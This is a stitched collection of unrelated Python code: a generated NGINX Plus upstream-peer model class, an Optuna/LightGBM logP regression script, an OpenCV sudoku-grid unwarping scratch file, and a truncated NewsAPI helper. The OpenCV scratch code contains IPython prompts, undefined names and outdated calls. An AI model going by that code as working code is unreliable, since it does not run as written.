# ===== file: nginxplus/models/nginx_http_upstream_peer.py =====

up”, “draining”, “down”, “unavail”, “checking”, and “unhealthy”.  # noqa: E501

        :return: The state of this NginxHTTPUpstreamPeer.  # noqa: E501
        :rtype: str
        """
        return self._state

    @state.setter
    def state(self, state):
        """Sets the state of this NginxHTTPUpstreamPeer.

        Current state, which may be one of “up”, “draining”, “down”, “unavail”, “checking”, and “unhealthy”.  # noqa: E501

        :param state: The state of this NginxHTTPUpstreamPeer.  # noqa: E501
        :type: str
        """
        allowed_values = ["up", "draining", "down", "unavail", "checking", "unhealthy"]  # noqa: E501
        if state not in allowed_values:
            raise ValueError(
                "Invalid value for `state` ({0}), must be one of {1}"  # noqa: E501
                .format(state, allowed_values)
            )

        self._state = state

    @property
    def active(self):
        """Gets the active of this NginxHTTPUpstreamPeer.  # noqa: E501

        The current number of active connections.  # noqa: E501

        :return: The active of this NginxHTTPUpstreamPeer.  # noqa: E501
        :rtype: int
        """
        return self._active

    @active.setter
    def active(self, active):
        """Sets the active of this NginxHTTPUpstreamPeer.

        The current number of active connections.  # noqa: E501

        :param active: The active of this NginxHTTPUpstreamPeer.  # noqa: E501
        :type: int
        """

        self._active = active

    @property
    def max_conns(self):
        """Gets the max_conns of this NginxHTTPUpstreamPeer.  # noqa: E501

        The max_conns limit for the server.  # noqa: E501

        :return: The max_conns of this NginxHTTPUpstreamPeer.  # noqa: E501
        :rtype: int
        """
        return self._max_conns

    @max_conns.setter
    def max_conns(self, max_conns):
        """Sets the max_conns of this NginxHTTPUpstreamPeer.

        The max_conns limit for the server.  # noqa: E501

        :param max_conns: The max_conns of this NginxHTTPUpstreamPeer.  # noqa: E501
        :type: int
        """

        self._max_conns = max_conns

    @property
    def requests(self):
        """Gets the requests of this NginxHTTPUpstreamPeer.  # noqa: E501

        The total number of client requests forwarded to this server.  # noqa: E501

        :return: The requests of this NginxHTTPUpstreamPeer.  # noqa: E501
        :rtype: int
        """
        return self._requests

    @requests.setter
    def requests(self, requests):
        """Sets the requests of this NginxHTTPUpstreamPeer.

        The total number of client requests forwarded to this server.  # noqa: E501

        :param requests: The requests of this NginxHTTPUpstreamPeer.  # noqa: E501
        :type: int
        """

        self._requests = requests

    @property
    def responses(self):
        """Gets the responses of this NginxHTTPUpstreamPeer.  # noqa: E501


        :return: The responses of this NginxHTTPUpstreamPeer.  # noqa: E501
        :rtype: NginxHTTPUpstreamPeerResponses
        """
        return self._responses

    @responses.setter
    def responses(self, responses):
        """Sets the responses of this NginxHTTPUpstreamPeer.


        :param responses: The responses of this NginxHTTPUpstreamPeer.  # noqa: E501
        :type: NginxHTTPUpstreamPeerResponses
        """

        self._responses = responses

    @property
    def sent(self):
        """Gets the sent of this NginxHTTPUpstreamPeer.  # noqa: E501

        The total number of bytes sent to this server.  # noqa: E501

        :return: The sent of this NginxHTTPUpstreamPeer.  # noqa: E501
        :rtype: int
        """
        return self._sent

    @sent.setter
    def sent(self, sent):
        """Sets the sent of this NginxHTTPUpstreamPeer.

        The total number of bytes sent to this server.  # noqa: E501

        :param sent: The sent of this NginxHTTPUpstreamPeer.  # noqa: E501
        :type: int
        """

        self._sent = sent

    @property
    def received(self):
        """Gets the received of this NginxHTTPUpstreamPeer.  # noqa: E501

        The total number of bytes received from this server.  # noqa: E501

        :return: The received of this NginxHTTPUpstreamPeer.  # noqa: E501
        :rtype: int
        """
        return self._received

    @received.setter
    def received(self, received):
        """Sets the received of this NginxHTTPUpstreamPeer.

        The total number of bytes received from this server.  # noqa: E501

        :param received: The received of this NginxHTTPUpstreamPeer.  # noqa: E501
        :type: int
        """

        self._received = received

    @property
    def fails(self):
        """Gets the fails of this NginxHTTPUpstreamPeer.  # noqa: E501

        The total number of unsuccessful attempts to communicate with the server.  # noqa: E501

        :return: The fails of this NginxHTTPUpstreamPeer.  # noqa: E501
        :rtype: int
        """
        return self._fails

    @fails.setter
    def fails(self, fails):
        """Sets the fails of this NginxHTTPUpstreamPeer.

        The total number of unsuccessful attempts to communicate with the server.  # noqa: E501

        :param fails: The fails of this NginxHTTPUpstreamPeer.  # noqa: E501
        :type: int
        """

        self._fails = fails

    @property
    def unavail(self):
        """Gets the unavail of this NginxHTTPUpstreamPeer.  # noqa: E501

        How many times the server became unavailable for client requests (state “unavail”) due to the number of unsuccessful attempts reaching the max_fails threshold.  # noqa: E501

        :return: The unavail of this NginxHTTPUpstreamPeer.  # noqa: E501
        :rtype: int
        """
        return self._unavail

    @unavail.setter
    def unavail(self, unavail):
        """Sets the unavail of this NginxHTTPUpstreamPeer.

        How many times the server became unavailable for client requests (state “unavail”) due to the number of unsuccessful attempts reaching the max_fails threshold.  # noqa: E501

        :param unavail: The unavail of this NginxHTTPUpstreamPeer.  # noqa: E501
        :type: int
        """

        self._unavail = unavail

    @property
    def health_checks(self):
        """Gets the health_checks of this NginxHTTPUpstreamPeer.  # noqa: E501


        :return: The health_checks of this NginxHTTPUpstreamPeer.  # noqa: E501
        :rtype: NginxHTTPUpstreamPeerHealthChecks
        """
        return self._health_checks

    @health_checks.setter
    def health_checks(self, health_checks):
        """Sets the health_checks of this NginxHTTPUpstreamPeer.


        :param health_checks: The health_checks of this NginxHTTPUpstreamPeer.  # noqa: E501
        :type: NginxHTTPUpstreamPeerHealthChecks
        """

        self._health_checks = health_checks

    @property
    def downtime(self):
        """Gets the downtime of this NginxHTTPUpstreamPeer.  # noqa: E501

        Total time the server was in the “unavail”, “checking”, and “unhealthy” states.  # noqa: E501

        :return: The downtime of this NginxHTTPUpstreamPeer.  # noqa: E501
        :rtype: int
        """
        return self._downtime

    @downtime.setter
    def downtime(self, downtime):
        """Sets the downtime of this NginxHTTPUpstreamPeer.

        Total time the server was in the “unavail”, “checking”, and “unhealthy” states.  # noqa: E501

        :param downtime: The downtime of this NginxHTTPUpstreamPeer.  # noqa: E501
        :type: int
        """

        self._downtime = downtime

    @property
    def downstart(self):
        """Gets the downstart of this NginxHTTPUpstreamPeer.  # noqa: E501

        The time (in milliseconds since Epoch) when the server became “unavail”, “checking”, or “unhealthy”.  # noqa: E501

        :return: The downstart of this NginxHTTPUpstreamPeer.  # noqa: E501
        :rtype: datetime
        """
        return self._downstart

    @downstart.setter
    def downstart(self, downstart):
        """Sets the downstart of this NginxHTTPUpstreamPeer.

        The time (in milliseconds since Epoch) when the server became “unavail”, “checking”, or “unhealthy”.  # noqa: E501

        :param downstart: The downstart of this NginxHTTPUpstreamPeer.  # noqa: E501
        :type: datetime
        """

        self._downstart = downstart

    @property
    def selected(self):
        """Gets the selected of this NginxHTTPUpstreamPeer.  # noqa: E501

        The time (in milliseconds since Epoch) when the server was last selected to process a request.  # noqa: E501

        :return: The selected of this NginxHTTPUpstreamPeer.  # noqa: E501
        :rtype: datetime
        """
        return self._selected

    @selected.setter
    def selected(self, selected):
        """Sets the selected of this NginxHTTPUpstreamPeer.

        The time (in milliseconds since Epoch) when the server was last selected to process a request.  # noqa: E501

        :param selected: The selected of this NginxHTTPUpstreamPeer.  # noqa: E501
        :type: datetime
        """

        self._selected = selected

    @property
    def header_time(self):
        """Gets the header_time of this NginxHTTPUpstreamPeer.  # noqa: E501

        The average time to get the response header from the server.  # noqa: E501

        :return: The header_time of this NginxHTTPUpstreamPeer.  # noqa: E501
        :rtype: int
        """
        return self._header_time

    @header_time.setter
    def header_time(self, header_time):
        """Sets the header_time of this NginxHTTPUpstreamPeer.

        The average time to get the response header from the server.  # noqa: E501

        :param header_time: The header_time of this NginxHTTPUpstreamPeer.  # noqa: E501
        :type: int
        """

        self._header_time = header_time

    @property
    def response_time(self):
        """Gets the response_time of this NginxHTTPUpstreamPeer.  # noqa: E501

        The average time to get the full response from the server.  # noqa: E501

        :return: The response_time of this NginxHTTPUpstreamPeer.  # noqa: E501
        :rtype: int
        """
        return self._response_time

    @response_time.setter
    def response_time(self, response_time):
        """Sets the response_time of this NginxHTTPUpstreamPeer.

        The average time to get the full response from the server.  # noqa: E501

        :param response_time: The response_time of this NginxHTTPUpstreamPeer.  # noqa: E501
        :type: int
        """

        self._response_time = response_time

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}

        for attr, _ in six.iteritems(self.swagger_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, NginxHTTPUpstreamPeer):
            return False

        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
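
# --- Added usage sketch (not part of the original generated file) ---
# The `state` setter above validates against `allowed_values` and raises
# ValueError on anything else. A minimal illustration, assuming the model can
# be constructed with no arguments as swagger-codegen models usually allow:
#
#     peer = NginxHTTPUpstreamPeer()
#     peer.state = "draining"      # accepted
#     peer.state = "rebooting"     # raises ValueError: Invalid value for `state` ...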
+{"seq_id":"385208642","text":"# $ python3 newcomer3_6.py fukunishi_data.csv\n\nimport warnings\nwarnings.simplefilter('ignore')\n\nimport sys\nimport math\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom rdkit import Chem, DataStructs\nfrom rdkit.Chem import AllChem, Descriptors, Descriptors3D\nfrom rdkit.ML.Descriptors import MoleculeDescriptors\nfrom RDKit_calc import RDKit_calculator\n\nfrom sklearn import *\nfrom sklearn.linear_model import *\nfrom sklearn.ensemble import RandomForestRegressor as RFR\nfrom sklearn.metrics import mean_squared_error, r2_score\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import KFold\n\nimport lightgbm as lgb\nimport optuna\n# import optuna.integration.lightgbm as olgb\n\n#*================================================*\n#Prepare for searching hyper parameter \n\ndef result_reg(reg):\n\treg.fit(X_train, y_train)\n\ty_pred = reg.predict(X_test)\n\tprint('#---------------------------------------#')\n\tprint('RMSE : ' + str(math.sqrt(mean_squared_error(y_test, y_pred))))\n\tprint('Q^2 : ' + str(r2_score(y_test, y_pred)))\n\tprint('#---------------------------------------#')\n\ndef objective_Ridge(trial):\n\talpha = trial.suggest_loguniform('alpha', 1e-4, 15)\n\tmax_iter = trial.suggest_loguniform('max_iter', 1, 1000)\n\n\treg = Ridge(alpha=alpha,\n\t\t\t max_iter=max_iter)\n\n\tkf = KFold(n_splits=4, shuffle=True, random_state=0)\n\tRMSE = []\n\tfor tr_index, val_index in kf.split(X_train, y_train):\n\t\tX_tr, X_val = X_train[tr_index], X_train[val_index]\n\t\ty_tr, y_val = y_train[tr_index], y_train[val_index]\n\t\treg.fit(X_tr, y_tr)\n\t\ty_pr = reg.predict(X_val)\n\t\tRMSE.append(math.sqrt(mean_squared_error(y_val, y_pr)))\n\treturn np.array(RMSE).mean()\n\ndef objective_BRidge(trial):\n\talpha_1 = trial.suggest_loguniform('alpha_1', 1e-8, 1e-4)\n\talpha_2 = trial.suggest_loguniform('alpha_2', 1e-8, 1e-4)\n\tlambda_1 = trial.suggest_loguniform('lambda_1', 1e-8, 1e-4)\n\tlambda_2 = trial.suggest_loguniform('lambda_2', 1e-8, 1e-4)\n\tn_iter = trial.suggest_int('n_iter', 1, 500)\n\n\treg = BayesianRidge(alpha_1=alpha_1,\n\t\t\t\t\t\talpha_2=alpha_2,\n\t\t\t\t\t\tlambda_1=lambda_1,\n\t\t\t\t\t\tlambda_2=lambda_2,\n\t\t\t\t\t n_iter=n_iter)\n\n\tkf = KFold(n_splits=4, shuffle=True, random_state=0)\n\tRMSE = []\n\tfor tr_index, val_index in kf.split(X_train, y_train):\n\t\tX_tr, X_val = X_train[tr_index], X_train[val_index]\n\t\ty_tr, y_val = y_train[tr_index], y_train[val_index]\n\t\treg.fit(X_tr, y_tr)\n\t\ty_pr = reg.predict(X_val)\n\t\tRMSE.append(math.sqrt(mean_squared_error(y_val, y_pr)))\n\treturn np.array(RMSE).mean()\n\ndef objective_SVR(trial):\n\tkernel = trial.suggest_categorical('kernel', ['linear', 'poly', 'rbf', 'sigmoid'])\n\tgamma = trial.suggest_categorical('gamma', ['scale', 'auto'])\n\ttol = trial.suggest_loguniform('tol', 1e-5, 1e-1)\n\tC = trial.suggest_loguniform('C', 1e-4, 10)\n\tepsilon = trial.suggest_loguniform('epsilon', 1e-4, 1e-1)\n\n\treg = svm.SVR(kernel=kernel,\n\t\t\t\t gamma=gamma,\n\t\t\t\t tol=tol,\n\t\t\t\t C=C,\n\t\t\t\t epsilon=epsilon)\n\n\tkf = KFold(n_splits=4, shuffle=True, random_state=0)\n\tRMSE = []\n\tfor tr_index, val_index in kf.split(X_train, y_train):\n\t\tX_tr, X_val = X_train[tr_index], X_train[val_index]\n\t\ty_tr, y_val = y_train[tr_index], y_train[val_index]\n\t\treg.fit(X_tr, y_tr)\n\t\ty_pr = reg.predict(X_val)\n\t\tRMSE.append(math.sqrt(mean_squared_error(y_val, y_pr)))\n\treturn 
np.array(RMSE).mean()\n\ndef objective_KN(trial):\n\tn_neighbors = trial.suggest_int('n_neighbors', 1, 15)\n\tweights = trial.suggest_categorical('weights', ['uniform', 'distance'])\n\talgorithm = trial.suggest_categorical('algorithm', ['auto', 'ball_tree', 'kd_tree', 'brute'])\n\tleaf_size = trial.suggest_int('leaf_size', 10, 50)\n\n\treg = neighbors.KNeighborsRegressor(n_neighbors=n_neighbors,\n\t\t\t\t\t\t\t\t \t weights=weights,\n\t\t\t\t\t\t\t\t\t algorithm=algorithm,\n\t\t\t\t\t\t\t\t\t leaf_size=leaf_size,\n\t\t\t\t\t\t\t\t\t n_jobs=-1)\n\n\tkf = KFold(n_splits=4, shuffle=True, random_state=0)\n\tRMSE = []\n\tfor tr_index, val_index in kf.split(X_train, y_train):\n\t\tX_tr, X_val = X_train[tr_index], X_train[val_index]\n\t\ty_tr, y_val = y_train[tr_index], y_train[val_index]\n\t\treg.fit(X_tr, y_tr)\n\t\ty_pr = reg.predict(X_val)\n\t\tRMSE.append(math.sqrt(mean_squared_error(y_val, y_pr)))\n\treturn np.array(RMSE).mean()\n\ndef objective_RFR(trial):\n\tn_estimators = trial.suggest_int('n_estimators', 50, 200)\n\tmax_depth = trial.suggest_int('max_depth', 100, 500)\n\tmin_samples_split = trial.suggest_int('min_samples_split', 2, 5)\n\tmin_samples_leaf = trial.suggest_int('min_samples_leaf', 1, 10)\n\tmax_features = trial.suggest_categorical('max_features', ['auto', 'sqrt', 'log2'])\n\n\treg = RFR(n_estimators=n_estimators,\n\t\t\t max_depth=max_depth,\n\t\t\t min_samples_split=min_samples_split,\n\t\t\t min_samples_leaf=min_samples_leaf,\n\t\t\t max_features=max_features,\n\t\t\t n_jobs=-1,\n\t\t\t random_state=0)\n\n\tkf = KFold(n_splits=4, shuffle=True, random_state=0)\n\tRMSE = []\n\tfor tr_index, val_index in kf.split(X_train, y_train):\n\t\tX_tr, X_val = X_train[tr_index], X_train[val_index]\n\t\ty_tr, y_val = y_train[tr_index], y_train[val_index]\n\t\treg.fit(X_tr, y_tr)\n\t\ty_pr = reg.predict(X_val)\n\t\tRMSE.append(math.sqrt(mean_squared_error(y_val, y_pr)))\n\treturn np.array(RMSE).mean()\n\n\ndef objective_LGB(trial):\n\tboosting_type = trial.suggest_categorical('boosting_type', ['gbdt', 'goss'])\n\tnum_leaves = trial.suggest_int('num_leaves', 30, 100)\n\tmax_depth = trial.suggest_int('max_depth', 700, 1000)\n\tlearning_rate = trial.suggest_loguniform('learning_rate', 5e-3, 5e-1)\n\tn_estimators = trial.suggest_int('n_estimators', 200, 500)\n\tmin_child_weight = trial.suggest_loguniform('min_child_weight', 1e-8, 1e-5)\n\tmin_child_samples = trial.suggest_int('min_child_samples', 8, 30)\n\treg_lambda = trial.suggest_loguniform('reg_lambda', 1e-9, 1e-5)\n\n\treg = lgb.LGBMRegressor(boosting_type=boosting_type,\n\t\t\t\t\t\t\tnum_leaves=num_leaves,\n\t\t\t\t\t\t\tmax_depth=max_depth,\n\t\t\t\t\t\t\tlearning_rate=learning_rate,\n\t\t\t\t\t\t\tn_estimators=n_estimators,\n\t\t\t\t\t\t\tmin_child_weight=min_child_weight,\n\t\t\t\t\t\t\tmin_child_samples=min_child_samples,\n\t\t\t\t\t\t\treg_lambda=reg_lambda,\n\t\t\t\t\t\t\tn_jobs=-1,\n\t\t\t\t\t\t\trandom_state=0)\n\n\tkf = KFold(n_splits=4, shuffle=True, random_state=0)\n\tRMSE = []\n\tfor tr_index, val_index in kf.split(X_train, y_train):\n\t\tX_tr, X_val = X_train[tr_index], X_train[val_index]\n\t\ty_tr, y_val = y_train[tr_index], y_train[val_index]\n\t\treg.fit(X_tr, y_tr)\n\t\ty_pr = reg.predict(X_val)\n\t\tRMSE.append(math.sqrt(mean_squared_error(y_val, y_pr)))\n\treturn np.array(RMSE).mean()\n\n# def lgb_cv(X, y):\n# \tds = olgb.Dataset(X, y)\n# \tparams = {'objective':'regression',\n# \t\t\t 'metric':'rmse',\n# \t\t\t 'random_seed':0}\n# \ttuner = olgb.LightGBMTunerCV(params, ds, verbose_eval=-1, num_boost_round=1000, 
folds=KFold(n_splits=4), verbosity=-1)\n# \ttuner.run()\n# \tprint('LightGBM : Best parameters')\n# \tprint(tuner.best_params)\n# \tresult_reg(lgb.LGBMRegressor(**tuner.best_params), X, y)\n\n#*================================================*\n\ndf = pd.read_csv(sys.argv[1])\nsmiles = df['SMILES'].values\nRDKit_descriptor = RDKit_calculator(smiles)\n\n#set explanatory variables and response variable\nX = RDKit_descriptor.compute_2D_desc()\ny = df['LogP app'].values\n\n#Standardization of explanatory variables\nsc = StandardScaler()\nX = sc.fit_transform(X)\n\n#split data\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=95, random_state=0)\n\n# study = optuna.create_study()\n# study.optimize(objective_Ridge, n_trials=100)\n# print('Ridge : Best parameters')\n# print(study.best_params)\n# result_reg(Ridge(**study.best_params))\n\n# study = optuna.create_study()\n# study.optimize(objective_BRidge, n_trials=100)\n# print('BayesianRidge : Best parameters')\n# print(study.best_params)\n# result_reg(BayesianRidge(**study.best_params))\n\n# study = optuna.create_study()\n# study.optimize(objective_SVR, n_trials=100)\n# print('SVR : Best parameters')\n# print(study.best_params)\n# result_reg(svm.SVR(**study.best_params))\n\n# study = optuna.create_study()\n# study.optimize(objective_KN, n_trials=100)\n# print('KNeighborsRegressor : Best parameters')\n# print(study.best_params)\n# result_reg(neighbors.KNeighborsRegressor(**study.best_params))\n\n# study = optuna.create_study()\n# study.optimize(objective_RFR, n_trials=100)\n# print('RFR : Best parameters')\n# print(study.best_params)\n# result_reg(RFR(**study.best_params))\n\nstudy = optuna.create_study()\nstudy.optimize(objective_LGB, n_trials=100)\nprint('LGB : Best parameters')\nprint(study.best_params)\nresult_reg(lgb.LGBMRegressor(**study.best_params))\n\n# lgb_cv(X, y)\n","sub_path":"newcomer3/newcomer3_6.py","file_name":"newcomer3_6.py","file_ext":"py","file_size_in_byte":8434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
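
# --- Added sketch (not part of the original script) ---
# Every objective above repeats the same 4-fold CV/RMSE loop. One way to factor
# that out is a small helper like the one below; this is a hypothetical refactor
# for illustration, relying on the imports already present in the script:

def cv_rmse(reg, X, y, n_splits=4):
    """Mean RMSE of `reg` over a KFold split, mirroring the loops above."""
    kf = KFold(n_splits=n_splits, shuffle=True, random_state=0)
    scores = []
    for tr_index, val_index in kf.split(X, y):
        reg.fit(X[tr_index], y[tr_index])
        y_pr = reg.predict(X[val_index])
        scores.append(math.sqrt(mean_squared_error(y[val_index], y_pr)))
    return np.array(scores).mean()

# Each objective could then simply end with: return cv_rmse(reg, X_train, y_train)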
+{"seq_id":"584610079","text":"import cv2\n\nimg = cv2.imread('120_5096.jpg', cv2.CV_LOAD_IMAGE_COLOR)\ncv2.namedWindow('Image')\ncv2.imshow('Image',img)\ncv2.waitKey(0)\n##cv2.destroyAllWindows()\n\ngray_image = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\ncv2.imshow('color_image',image)\ncv2.imshow('gray_image',gray_image)\ncv2.waitKey(0)\n\n\nIn [81]: centroids = np.array(centroids,dtype = np.float32)\n\nIn [82]: c = centroids.reshape((shape(centroids)[0],shape(centroids)[1]))\n\nIn [86]: a = shape(centroids)[0]\n\nIn [87]: b = np.vstack([c2[i*(a/10):(i+1)*(a/10)][np.argsort(c2[i*(a/10):(i+1)*(a/10),0])] for i in xrange(a/10)])\n\nbm = b.reshape(((a/10),(a/10),2))\n\n\n\n############################################################################################################################################################\n\n## unwarp image (Sudoku Solver example)\n\n# 1. Image PreProcessing ( closing operation )\n\nimg = cv2.imread('120_5256.jpg') # 120_5096\nimg = cv2.GaussianBlur(img,(5,5),0)\ngray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\nmask = np.zeros((gray.shape),np.uint8)\nkernel1 = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(11,11)) # ellipsiodal kernel (should test using other kernels to see the difference)\n\nclose = cv2.morphologyEx(gray,cv2.MORPH_CLOSE,kernel1) # advanced morphological transformation (closing operation - removing small black areas)\ndiv = np.float32(gray)/(close) # cleans up the image (no idea why!)\nres = np.uint8(cv2.normalize(div,div,0,255,cv2.NORM_MINMAX)) # linear normalization\nres2 = cv2.cvtColor(res,cv2.COLOR_GRAY2BGR) # gray to RGB\n\n# 2. Finding Sudoku Square and Creating Mask Image\n\nthresh = cv2.adaptiveThreshold(res,255,0,1,19,2)\ncontour,hier = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n\nmax_area = 0\nbest_cnt = None\nfor cnt in contour:\n area = cv2.contourArea(cnt)\n if area > 1000: # need to test other values for project images\n if area > max_area:\n max_area = area\n best_cnt = cnt\n\ncv2.drawContours(mask,[best_cnt],0,255,-1)\ncv2.drawContours(mask,[best_cnt],0,0,2)\n\nres = cv2.bitwise_and(res,mask)\n\n# 3. Finding Vertical lines\n\nkernelx = cv2.getStructuringElement(cv2.MORPH_RECT,(2,10)) # a 2 by 10 rectangle\n\ndx = cv2.Sobel(res,cv2.CV_16S,1,0)\ndx = cv2.convertScaleAbs(dx)\ncv2.normalize(dx,dx,0,255,cv2.NORM_MINMAX)\nret,close = cv2.threshold(dx,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\nclose = cv2.morphologyEx(close,cv2.MORPH_DILATE,kernelx,iterations = 1)\n\ncontour, hier = cv2.findContours(close,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\nfor cnt in contour:\n x,y,w,h = cv2.boundingRect(cnt)\n if h/w > 5:\n cv2.drawContours(close,[cnt],0,255,-1)\n else:\n cv2.drawContours(close,[cnt],0,0,-1)\nclose = cv2.morphologyEx(close,cv2.MORPH_CLOSE,None,iterations = 2)\nclosex = close.copy()\n\n# 4. Finding Horizontal Lines\n\nkernely = cv2.getStructuringElement(cv2.MORPH_RECT,(10,2))\ndy = cv2.Sobel(res,cv2.CV_16S,0,2)\ndy = cv2.convertScaleAbs(dy)\ncv2.normalize(dy,dy,0,255,cv2.NORM_MINMAX)\nret,close = cv2.threshold(dy,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\nclose = cv2.morphologyEx(close,cv2.MORPH_DILATE,kernely)\n\ncontour, hier = cv2.findContours(close,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\nfor cnt in contour:\n x,y,w,h = cv2.boundingRect(cnt)\n if w/h > 5:\n cv2.drawContours(close,[cnt],0,255,-1)\n else:\n cv2.drawContours(close,[cnt],0,0,-1)\n\nclose = cv2.morphologyEx(close,cv2.MORPH_DILATE,None,iterations = 2)\nclosey = close.copy()\n\n# 5. 
Finding Grid Points\n\nres = cv2.bitwise_and(closex,closey)\n\n############################################################################################################################################################\n\n## get rid of the grids\n\nres = cv2.bitwise_or(closex, closey)\nx = np.where(res > 0)\nx = np.array(x)\n\nfor i in range(shape(x)[1]):\n gray[x[0,i], x[1,i]] = 255\n\n############################################################################################################################################################\n\n# 6. Correcting the defects\n\ncontour, hier = cv2.findContours(res,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)\ncentroids = []\nfor cnt in contour:\n mom = cv2.moments(cnt)\n (x,y) = int(mom['m10']/mom['m00']), int(mom['m01']/mom['m00'])\n cv2.circle(img,(x,y),4,(0,255,0),-1)\n centroids.append((x,y))\n\ncentroids = np.array(centroids,dtype = np.float32)\nc = centroids.reshape((shape(centroids)[0],2)) # check whether this line is required or not\n\n### just to properly sort the centroid indices\n\nc2 = c[np.argsort(c[:,1])] # sort along y-axis (sort the values along y-axis only leaving x-axis as it is to get the coordinates with y-axis sorted)\n # (100,2) array\n\nb = np.vstack([c2[i*10:(i+1)*10][np.argsort(c2[i*10:(i+1)*10,0])] for i in xrange(10)])\nbm = b.reshape((10,10,2))\n####\n\n# unwarp the image\n\noutput = np.zeros((450,450,3),np.uint8)\nfor i,j in enumerate(b): # almost like a percentage basis\n ri = i/10\n ci = i%10\n if ci != 9 and ri!=9:\n src = bm[ri:ri+2, ci:ci+2 , :].reshape((4,2))\n dst = np.array( [ [ci*50,ri*50],[(ci+1)*50-1,ri*50],[ci*50,(ri+1)*50-1],[(ci+1)*50-1,(ri+1)*50-1] ], np.float32) # see tutorial for details (logic)\n retval = cv2.getPerspectiveTransform(src,dst)\n warp = cv2.warpPerspective(res2,retval,(450,450))\n output[ri*50:(ri+1)*50-1 , ci*50:(ci+1)*50-1] = warp[ri*50:(ri+1)*50-1 , ci*50:(ci+1)*50-1].copy()\n\n############################################################################################################################################################\n\n## edit for project\n\na = round(shape(c2)[0]/10)\nb = np.vstack([c2[i*a:(i+1)*a][np.argsort(c2[i*a:(i+1)*a,0])] for i in xrange(10)])\na1 = round(shape(c2)[0]/a)\nbm = b.reshape((a1,a,2))\noutput = np.zeros((432, 576, 3),np.uint8)\n\nfor i,j in enumerate(b):\n ri = i/6\n ci = i%10\n if ri != 9 and ci < 5:\n src = bm[ri:ri+2, ci:ci+2 , :].reshape((4,2))\n #print i, src\n dst = np.array( [ [ci*50,ri*50],[(ci+1)*50-1,ri*50],[ci*50,(ri+1)*50-1],[(ci+1)*50-1,(ri+1)*50-1] ], np.float32)\n retval = cv2.getPerspectiveTransform(src,dst)\n warp = cv2.warpPerspective(res2,retval,(432, 576))\n output[ri*50:(ri+1)*50-1 , ci*50:(ci+1)*50-1] = warp[ri*50:(ri+1)*50-1 , ci*50:(ci+1)*50-1].copy()\n\n\nretval = cv2.getPerspectiveTransform(src,dst)\nwarp = cv2.warpPerspective(res2,retval,(450,450))\noutput[ri*50:(ri+1)*50-1 , ci*50:(ci+1)*50-1] = warp[ri*50:(ri+1)*50-1 , ci*50:(ci+1)*50-1].copy()\n","sub_path":"Other files (test scripts etc.)/OpenCV.py","file_name":"OpenCV.py","file_ext":"py","file_size_in_byte":6468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"396929147","text":"\"\"\"\nThis file hold functions and constants that are specific to the\nNews API at http://newsapi.org\n\"\"\"\n\nimport logging\n\nfrom newsapi import NewsApiClient\n\nlogger = logging.getLogger(__name__)\n\ndef get_all_sources(news_api_key):\n\t\"\"\"\n\tReturn all the sources from the NewsAPI.\n\n\tReturn format:\n\t\tIf no error:\n\t\t\t[\n\t\t\t\t{\n\t\t\t\t\t'id': 'abc-news',\n\t\t\t\t\t'name': 'ABC News',\n\t\t\t\t\t'description': 'Your trusted source for breaking blah blah.',\n\t\t\t\t\t'url': 'https://abcnews.go.com',\n\t\t\t\t\t'category': 'general',\n\t\t\t\t\t'language': 'en',\n\t\t\t\t\t'country': 'us'\n\t\t\t\t}\n\t\t\t]\n\t\tIf error:\n\t\t\tRasies exception.\n\t\"\"\"\n\tnews_api_client = NewsApiClient(api_key=news_api_key)\n\n\t# This can also raise an excption\n\tsources = news_api_client.get_sources()\n\n\tif sources[\"status\"] == \"ok\":\n\t\t# We're all good\n\t\treturn sources[\"sources\"]\n\telse:\n\t\tlogger.exception(\"Error getting sources. Got the following return object: {0}\".format(\n\t\t\tsources\n\t\t), exc_info=True)\n\n\t\traise Exception(\"There was an error getting sources. See log.\")\n\ndef get_top_articles(source_id, news_api_key):\n\t\"\"\"\n\tReturn all the current top articles from the given source.\n\tIf there is any error whatsoever, this will throw an exception. So, if articles are returned\n\tand the fuunc exits successfully, there have been no errors.\n\n\tReturn format:\n\t\tIf error:\n\t\t\traises Exception\n\t\tIf no error:\n\t\t\t[\n\t\t\t\t{\n\t\t\t\t\t'source_id': 'abc-news', \n\t\t\t\t\t'author': 'John Parkinson', \n\t\t\t\t\t'title': \"Florida Bar looking at GOP ...\", \n\t\t\t\t\t'description': 'Florida Republican Rep. ...', \n\t\t\t\t\t'url': 'https://abcnews.go.com/Politics/florida-bar-gop-lawmakers-tweet-targeting-michael-cohen/story?id=62910364', \n\t\t\t\t\t'urlToImage': 'https://s.abcnews.com/images/Politics/matt-gaetz-epa-jef-190508_hpMain_16x9_992.jpg', \n\t\t\t\t\t'publishedAt': '2019-05-08T21:49:58Z', \n\t\t\t\t\t'content': 'Florida Republican Rep. Matt Gaetz is facing continued ... … [+3846 chars]'\n\t\t\t\t}, 